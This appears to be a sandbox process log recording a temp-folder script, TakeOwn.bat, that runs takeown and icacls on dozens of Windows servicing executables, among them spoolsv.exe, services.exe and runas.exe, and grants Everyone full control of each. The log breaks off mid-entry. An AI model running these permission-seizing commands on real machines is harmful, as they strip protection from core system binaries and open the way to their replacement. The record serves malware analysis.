C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.22000.120_none_6698726619b2ab7a\f\PerceptionSimulationInput.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.22000.120_none_6698726619b2ab7a\f\PerceptionSimulationInput.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.22000.120_none_6698726619b2ab7a\f\PerceptionSimulationInput.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_e83cf4fa7871c56f\f\PkgMgr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_e83cf4fa7871c56f\f\PkgMgr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_e83cf4fa7871c56f\f\PkgMgr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.22000.37_none_7461fc8593f740b9\f\ApproveChildRequest.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.22000.37_none_7461fc8593f740b9\f\ApproveChildRequest.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.22000.37_none_7461fc8593f740b9\f\ApproveChildRequest.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.22000.434_none_4f4ac04322f04123\f\PktMon.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.22000.434_none_4f4ac04322f04123\f\PktMon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.22000.434_none_4f4ac04322f04123\f\PktMon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\splwow64.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\splwow64.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\splwow64.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\spoolsv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\spoolsv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\f\spoolsv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.22000.65_none_99e34b544b7754a7\f\provtool.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.22000.65_none_99e34b544b7754a7\f\provtool.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.22000.65_none_99e34b544b7754a7\f\provtool.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_123327ab91644184\f\raserver.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_123327ab91644184\f\raserver.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_123327ab91644184\f\raserver.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.22000.132_none_23ef129810e14356\f\RecoveryDrive.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.22000.132_none_23ef129810e14356\f\RecoveryDrive.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.22000.132_none_23ef129810e14356\f\RecoveryDrive.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-refsutil_31bf3856ad364e35_10.0.22000.434_none_e6157b76b496d682\f\refsutil.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-refsutil_31bf3856ad364e35_10.0.22000.434_none_e6157b76b496d682\f\refsutil.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-refsutil_31bf3856ad364e35_10.0.22000.434_none_e6157b76b496d682\f\refsutil.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\msra.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\msra.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\msra.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\sdchange.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\sdchange.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_32bd480a87134e0f\f\sdchange.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_c24a28fb71aa07c9\f\Robocopy.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_c24a28fb71aa07c9\f\Robocopy.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_c24a28fb71aa07c9\f\Robocopy.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_5b46b110e29f5b31\f\runas.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_5b46b110e29f5b31\f\runas.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_5b46b110e29f5b31\f\runas.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_f07c0067839c600d\f\RMActivate_ssp_isv.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_f07c0067839c600d\f\RMActivate_ssp_isv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_f07c0067839c600d\f\RMActivate_ssp_isv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.22000.469_none_40856ba085a100c4\f\BioIso.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.22000.469_none_40856ba085a100c4\f\BioIso.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.22000.469_none_40856ba085a100c4\f\BioIso.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..estartup-change-pin_31bf3856ad364e35_10.0.22000.194_none_ecba39f8d9cbe846\f\bdechangepin.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..estartup-change-pin_31bf3856ad364e35_10.0.22000.194_none_ecba39f8d9cbe846\f\bdechangepin.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..estartup-change-pin_31bf3856ad364e35_10.0.22000.194_none_ecba39f8d9cbe846\f\bdechangepin.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..hreshold-adminflows_31bf3856ad364e35_10.0.22000.100_none_1c26ef58a3003bf2\f\SystemSettingsAdminFlows.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..hreshold-adminflows_31bf3856ad364e35_10.0.22000.100_none_1c26ef58a3003bf2\f\SystemSettingsAdminFlows.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..hreshold-adminflows_31bf3856ad364e35_10.0.22000.100_none_1c26ef58a3003bf2\f\SystemSettingsAdminFlows.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..msettings-datamodel_31bf3856ad364e35_10.0.22000.469_none_e574fa2e821169ac\f\SystemSettingsBroker.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..msettings-datamodel_31bf3856ad364e35_10.0.22000.469_none_e574fa2e821169ac\f\SystemSettingsBroker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..msettings-datamodel_31bf3856ad364e35_10.0.22000.469_none_e574fa2e821169ac\f\SystemSettingsBroker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..nt-enrollmenthelper_31bf3856ad364e35_10.0.22000.41_none_1d0a15319901359b\f\PinEnrollmentBroker.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..nt-enrollmenthelper_31bf3856ad364e35_10.0.22000.41_none_1d0a15319901359b\f\PinEnrollmentBroker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..nt-enrollmenthelper_31bf3856ad364e35_10.0.22000.41_none_1d0a15319901359b\f\PinEnrollmentBroker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.22000.469_none_5704c6175ad01b79\f\Microsoft.AAD.BrokerPlugin.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.22000.469_none_5704c6175ad01b79\f\Microsoft.AAD.BrokerPlugin.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.22000.469_none_5704c6175ad01b79\f\Microsoft.AAD.BrokerPlugin.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\diagtrackrunner.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\diagtrackrunner.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\diagtrackrunner.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\SetupPlatform.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\SetupPlatform.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..platform-media-base_31bf3856ad364e35_10.0.22000.376_none_d0bc762eaa58a5f0\f\SetupPlatform.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_f6a11a34378fa70f\f\StartMenuExperienceHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_f6a11a34378fa70f\f\StartMenuExperienceHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_f6a11a34378fa70f\f\StartMenuExperienceHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.132_none_f836cc528422524b\f\ShellExperienceHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.132_none_f836cc528422524b\f\ShellExperienceHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.22000.132_none_f836cc528422524b\f\ShellExperienceHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rity-spp-validation_31bf3856ad364e35_10.0.22000.176_none_161fead9a85c45cd\f\GenValObj.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rity-spp-validation_31bf3856ad364e35_10.0.22000.176_none_161fead9a85c45cd\f\GenValObj.exe"
C:\Windows\SysWOW64\icacls.exe
